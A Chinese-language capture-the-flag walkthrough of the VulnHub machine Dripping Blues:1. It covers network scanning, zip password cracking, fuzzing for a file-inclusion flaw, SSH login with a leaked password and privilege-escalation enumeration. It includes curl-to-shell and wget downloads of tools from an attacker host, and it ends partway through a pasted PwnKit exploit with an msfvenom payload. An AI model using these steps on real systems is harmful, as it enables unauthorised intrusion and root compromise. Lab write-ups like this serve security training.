靶机渗透练习102-Dripping Blues:1

靶机描述

靶机地址:https://www.vulnhub.com/entry/dripping-blues-1,744/

Description

get flags

difficulty: easy

about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.

一、搭建靶机环境

攻击机Kali

IP地址:192.168.11.130

靶机

IP地址:192.168.11.135

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VIrtualBox,设置为仅主机模式
  2. Kali设置为双网卡,网卡eth0设置为仅主机模式
  3. 本机上将两个网卡进行桥接

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)

arp-scan -I eth0 -l

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# arp-scan -I eth0 -l   
Interface: eth0, type: EN10MB, MAC: 00:0c:29:46:e0:a0, IPv4: 192.168.11.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1	00:50:56:c0:00:01	VMware, Inc.
192.168.11.135	08:00:27:67:71:e8	PCS Systemtechnik GmbH
192.168.11.254	00:50:56:fb:ca:88	VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 3 responded
                 
方法二、masscan 扫描的网段 -p 扫描端口号

masscan 192.168.11.0/24 -p 80,22

方法三、netdiscover -i 网卡-r 网段

netdiscover -i eth1 -r 192.168.11.0/24

方法四、fping -aqg 指定网段

fping -aqg 192.168.11.0/24

方法五、待补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# nmap -A -sV -T4 -p- 192.168.11.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 09:36 CST
Nmap scan report for 192.168.11.135
Host is up (0.00061s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.11.130
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
|   256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_  256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/dripisreal.txt /etc/dripispowerful.html
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:67:71:E8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.11.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.43 seconds

可以发现开了21、22、80端口

同时80端口下发现两个文件robots.txtdripisreal.txt

2.2枚举漏洞

2.2.1 21端口分析

尝试匿名登录一下,发现可以无密码匿名登录上去

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# ftp 192.168.11.135     
Connected to 192.168.11.135.
220 (vsFTPd 3.0.3)
Name (192.168.11.135:hirak0): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

既然登录上来了,那就看看有啥东西可以get下来的

ftp> ls -al
229 Entering Extended Passive Mode (|||10176|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Sep 19  2021 .
drwxr-xr-x    2 0        0            4096 Sep 19  2021 ..
-rwxrwxrwx    1 0        0             471 Sep 19  2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||9545|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |***********************************|   471        4.31 MiB/s    00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (335.00 KiB/s)
ftp> 

解压该压缩包发现需要密码

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# unzip respectmydrip.zip     
Archive:  respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:    

用zip爆破工具fcrackzip爆破一下

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

PASSWORD FOUND!!!!: pw == 072528035                                     

成功爆破出密码为072528035,解压后发现有两个文件respectmydrip.txt secret.zip

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# cat respectmydrip.txt 
just focus on "drip"                                                                                
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# unzip secret.zip       
Archive:  secret.zip
[secret.zip] secret.txt password:                                                                                 
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# 

drip暂时不知道啥用,先放着,压缩包开始套娃了,又一个压缩包需要密码

在爆破一下

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secret.zip

可能是字典的问题,先放着,分析一下其他端口

2.2.2 22端口分析

22端口目前除了爆破,没啥特别好的方法,考验字典,以及时间

2.2.3 80端口分析

访问:http://192.168.11.135/

image-20240403094854140

driftingblues又被黑了,所以现在叫做drippingblues。D:哈哈哈
by
travisscott & thugger

访问robots.txtdripisreal.txt

image-20240403095133463

除了dripisreal.txt,还有一个 /etc/dripispowerful.html,这个看着应该是一个绝对路径,既然是绝对路径,如果要通过url去读取该文件的内容,应该利用文件包含去读取了

image-20240403095150114

翻译一下

你好,亲爱的黑客崇拜者,

看看这句歌词:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

数数这n个单词,把它们并排放在一起,然后求和

即,hellohellohellohello >> md5sum hellohellohellohello

是SSH的密码

ssh密码就这样提供了?咋有种做CTF的套路呢,先放着,扫一下目录,看一下有没有其他有价值的

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─#  gobuster dir -u http://192.168.11.135 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.11.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,txt,html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 138]
/robots.txt           (Status: 200) [Size: 78]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================

没有其他发现

2.3 漏洞利用

2.3.1 文件包含漏洞利用

尝试对index.php做文件包含fuzz,这里可以使用wfuzz也可以使用Burp进行爆破枚举

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# wfuzz -c -u http://192.168.11.135/index.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 21

image-20240403102013796

通过wfuzz成功枚举出来了

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# wfuzz -c -u http://192.168.11.135/index.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 21
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.11.135/index.php?FUZZ=/etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                
=====================================================================

000172073:   200        57 L     107 W      3032 Ch     "drip"                                 
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

image-20240403102644938

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:128:134:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

这个可以发现用户thugger

咱们查看一下 /etc/dripispowerful.html

image-20240403102823128

password is:

imdrippinbiatch

这个密码,,,目前除了ssh,80没有发现登录的表单,secret.zip也无法解压

尝试ssh的登录一下thugger:imdrippinbiatch

成功登录

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# ssh thugger@192.168.11.135  
The authenticity of host '192.168.11.135 (192.168.11.135)' can't be established.
ED25519 key fingerprint is SHA256:eVoGERVw0lG6hbny1KztaN+fD1oHC/zhGfuexoATqME.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.11.135' (ED25519) to the list of known hosts.
thugger@192.168.11.135's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


495 updates can be installed immediately.
233 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Your Hardware Enablement Stack (HWE) is supported until April 2025.
thugger@drippingblues:~$ 

2.4 权限提升

信息收集一波

thugger@drippingblues:~$ ls -al
total 64
drwxr-xr-x 14 thugger thugger 4096 Eyl 19  2021 .
drwxr-xr-x  3 root    root    4096 Eyl 18  2021 ..
-rw-------  1 thugger thugger    8 Eyl 19  2021 .bash_history
drwxr-xr-x 10 thugger thugger 4096 Eyl 19  2021 .cache
drwxr-xr-x 11 thugger thugger 4096 Eyl 19  2021 .config
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Desktop
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Documents
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Downloads
drwxr-xr-x  3 thugger thugger 4096 Eyl 19  2021 .local
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Music
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Pictures
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Public
drwx------  2 thugger thugger 4096 Eyl 19  2021 .ssh
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Templates
-r-x------  1 thugger thugger   32 Eyl 19  2021 user.txt
drwxr-xr-x  2 thugger thugger 4096 Eyl 18  2021 Videos
thugger@drippingblues:~$ cat user.txt 
5C50FC503A2ABE93B4C5EE3425496521thugger@drippingblues:~$ 
thugger@drippingblues:~$ cat .bash_history 
su root

user.txt应该是flag1了,是一个md5值,解一下看看,toomanydrip

image-20240403121925154

咱们查看一下用户可以访问的suid二进制程序

方法一 :find查找suid二进制程序

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

thugger@drippingblues:~$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 111080 Ağu 10  2021 /snap/snapd/12883/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 110792 Nis 10  2020 /snap/snapd/7264/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Oca  8  2020 /snap/core18/1705/bin/mount
-rwsr-xr-x 1 root root 64424 Haz 28  2019 /snap/core18/1705/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/1705/bin/su
-rwsr-xr-x 1 root root 26696 Oca  8  2020 /snap/core18/1705/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/1705/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/1705/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/1705/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/1705/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/1705/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oca 31  2020 /snap/core18/1705/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Haz 10  2019 /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/1705/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Eyl 16  2020 /snap/core18/2128/bin/mount
-rwsr-xr-x 1 root root 64424 Haz 28  2019 /snap/core18/2128/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /snap/core18/2128/bin/su
-rwsr-xr-x 1 root root 26696 Eyl 16  2020 /snap/core18/2128/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /snap/core18/2128/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /snap/core18/2128/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /snap/core18/2128/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /snap/core18/2128/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /snap/core18/2128/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oca 19  2021 /snap/core18/2128/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Haz 11  2020 /snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /snap/core18/2128/usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root dip 395144 Şub 11  2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 31032 Ağu 16  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 67816 Nis  2  2020 /usr/bin/su
-rwsr-xr-x 1 root root 166056 Şub  3  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 39144 Nis  2  2020 /usr/bin/umount
-rwsr-xr-x 1 root root 14728 Mar 17  2021 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 85064 Nis 16  2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 53040 Nis 16  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 88464 Nis 16  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 68208 Nis 16  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 39144 Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44784 Nis 16  2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 55528 Nis  2  2020 /usr/bin/mount
-rwsr-xr-- 1 root messagebus 51344 Ara  7  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 14488 Nis  6  2020 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 22840 Ağu 16  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 130120 Nis 10  2020 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14488 Tem  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 473576 Tem 23  2021 /usr/lib/openssh/ssh-keysign

https://gtfobins.github.io/查找一下

未发现可以利用的,这里有个特殊的程序/usr/lib/policykit-1/polkit-agent-helper-1

方法二:suid3num.py使用

suid3num.py原脚本链接

本地监听

python -m http.server 8888                                                              

靶机下载

wget http://192.168.11.130:8888/suid3num.py

运行一下

thugger@drippingblues:~$ wget http://192.168.11.130:8888/suid3num.py
--2024-04-03 06:13:06--  http://192.168.11.130:8888/suid3num.py
Connecting to 192.168.11.130:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16632 (16K) [text/x-python]
Saving to: ‘suid3num.py’

suid3num.py                        100%[==============================================================>]  16,24K  --.-KB/s    in 0s      

2024-04-03 06:13:06 (36,0 MB/s) - ‘suid3num.py’ saved [16632/16632]

thugger@drippingblues:~$ python3 suid3num.py
  ___ _   _ _ ___    _____  _ _   _ __  __ 
 / __| | | / |   \  |__ / \| | | | |  \/  |
 \__ \ |_| | | |) |  |_ \ .` | |_| | |\/| |
 |___/\___/|_|___/  |___/_|\_|\___/|_|  |_|  twitter@syed__umar

[#] Finding/Listing all SUID Binaries ..
------------------------------
/snap/snapd/12883/usr/lib/snapd/snap-confine
/snap/snapd/7264/usr/lib/snapd/snap-confine
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/2128/bin/mount
/snap/core18/2128/bin/ping
/snap/core18/2128/bin/su
/snap/core18/2128/bin/umount
/snap/core18/2128/usr/bin/chfn
/snap/core18/2128/usr/bin/chsh
/snap/core18/2128/usr/bin/gpasswd
/snap/core18/2128/usr/bin/newgrp
/snap/core18/2128/usr/bin/passwd
/snap/core18/2128/usr/bin/sudo
/snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2128/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
------------------------------


[!] Default Binaries (Don't bother)
------------------------------
/snap/snapd/12883/usr/lib/snapd/snap-confine
/snap/snapd/7264/usr/lib/snapd/snap-confine
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/2128/bin/mount
/snap/core18/2128/bin/ping
/snap/core18/2128/bin/su
/snap/core18/2128/bin/umount
/snap/core18/2128/usr/bin/chfn
/snap/core18/2128/usr/bin/chsh
/snap/core18/2128/usr/bin/gpasswd
/snap/core18/2128/usr/bin/newgrp
/snap/core18/2128/usr/bin/passwd
/snap/core18/2128/usr/bin/sudo
/snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2128/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
------------------------------


[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
------------------------------


[#] SUID Binaries found in GTFO bins..
------------------------------
[!] None :(
------------------------------
方法三:linpeas神器使用

先准备好最新的linpeas.sh

# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# Without curl
python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

python3 -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"

本地监听

python -m http.server 8888                                                              

靶机下载

wget http://192.168.11.130:8888/linpeas.sh

运行一下看看

./linpeas.sh -a > linpeas.txt

查看最后结果,有不少漏洞,

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops

   Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
   Exposure: highly probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
   Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2022-2586] nft_object UAF

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: [ ubuntu=(20.04|21.04) ],debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

这里发现CVE-2021-4034中有涉及到前边发现的特殊程序polkit

https://blog.csdn.net/laobanjiull/article/details/122715651

突破口应该就是这个polkit

C在kali上打包程序上传靶机执行会出现

/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found 

换成python版本的测试一下

https://github.com/joeammond/CVE-2021-4034

#!/usr/bin/env python3

# CVE-2021-4034 in Python
#
# Joe Ammond (joe@ammond.org)
#
# This was just an experiment to see whether I could get this to work
# in Python, and to play around with ctypes

# This was completely cribbed from blasty's original C code:
# https://haxx.in/files/blasty-vs-pkexec.c

import base64
import os
import sys

from ctypes import *
from ctypes.util import find_library

# Payload, base64 encoded ELF shared object. Generate with:
#
# msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
#
# The PrependSetuid=true is important, without it you'll just get
# a shell as the user and not root.
#
# Should work with any msfvenom payload, tested with linux/x64/exec
# and linux/x64/shell_reverse_tcp

payload_b64 = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
